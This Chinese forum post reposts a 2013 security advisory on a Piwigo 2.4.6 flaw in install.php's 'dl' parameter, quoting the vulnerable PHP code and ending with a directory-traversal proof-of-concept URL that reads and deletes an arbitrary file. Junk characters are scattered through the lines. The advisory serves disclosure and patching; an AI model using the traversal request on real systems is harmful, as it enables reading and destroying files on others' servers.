找回密码
 立即注册
查看: 2966|回复: 0
打印 上一主题 下一主题

Piwigo任意文件泄露和任意文件删除漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:15:53 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Piwigo是用PHP编写的相册脚本。* Y. U& M/ q  \; D7 X. ?
4 Q0 y: l1 r) B3 M) V" a
Piwigo 2.4.6及其他版本没有正确验证install.php脚本的 'dl'参数值,在实现上存在安全漏洞,攻击者可利用这些漏洞查看受影响计算机上的任意文件,删除受影响应用上下文内的任意文件。
$ z' f5 [2 b. P* f' A====================================================================
4 M- S- R; Q- d% Y/ J2 L: v/install.php:
, Z9 Z4 Z  V2 X8 S. j' h& x-------------
) `9 C  Z6 Q3 ^113: if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))
1 i6 c" Z  J7 [+ {: w114: {
% c  |4 }1 I* y$ B3 z1 p5 J115:   $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];. }! D5 _0 k: |+ y8 C  q+ P
116:   header('Cache-Control: no-cache, must-revalidate');' k  Q$ `% t6 w8 `. `$ ?. T
117:   header('Pragma: no-cache');7 z( k3 M1 \7 Q" @
118:   header('Content-Disposition: attachment; filename="database.inc.php"');) m% g  s" n% C% j4 Y0 r# ^: H
119:   header('Content-Transfer-Encoding: binary');
- [9 W7 x* C- T) ?120:   header('Content-Length: '.filesize($filename));
" [8 f; j$ x# ]+ W& w8 s121:   echo file_get_contents($filename);4 \2 b- ]6 P) I( U4 I0 O: |" }. n
122:   unlink($filename);" g- I) d& ^; \- O
123:   exit();
8 j1 c: `/ n1 H7 S6 H124: }
! H4 S4 y8 a" I- [5 r====================================================================
  e2 o* G  p- @- {8 P5 z* F
- O( B# r$ F0 u: A8 A& }  ?Tested on: Microsoft Windows 7 Ultimate SP1 (EN)' ~2 z! L3 }3 d
           Apache 2.4.2 (Win32)
1 n8 c  p; f4 z* M! Y1 y4 R           PHP 5.4.4
% }) Z8 G+ H% p2 ^2 U+ `8 J           MySQL 5.5.25a
& f* ~% E) P' J2 W. o
2 d9 p/ L  |" |9 ]Vulnerability discovered by Gjoko 'LiquidWorm' Krstic0 K  l8 C( g9 g
                            @zeroscience  ^4 q3 B' J) E1 ~. @9 p9 b

9 r; ~3 f1 C6 X' I- uAdvisory ID: ZSL-2013-5127
9 ~2 x0 l* Q! h) p' o- d' D! J( N2 KAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php
4 ~& Z9 C, _1 {+ [$ t4 {" CVendor Patch: http://piwigo.org/bugs/view.php?id=28436 K% f9 p) P  l
+ E, r" m2 M* y" b. f3 E1 M. ~
15.02.2013$ h3 m( ~# J4 S, T! u& X

2 N! W) g1 A7 V1 ~7 y6 a( W  p--
0 I8 e6 P( h% T* p/ l, l# T) T, ^/ }http://localhost/piwigo/install.php?dl=../../../../../../lio_passwords.txt& D9 T1 L) l' K  G- K' n

3 d- y: v6 `, g9 \8 Z" I
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表